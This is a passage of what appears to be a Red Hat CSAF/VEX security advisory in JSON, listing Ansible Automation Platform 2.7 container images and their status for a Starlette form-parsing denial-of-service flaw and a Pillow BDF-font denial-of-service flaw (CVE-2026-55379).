"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
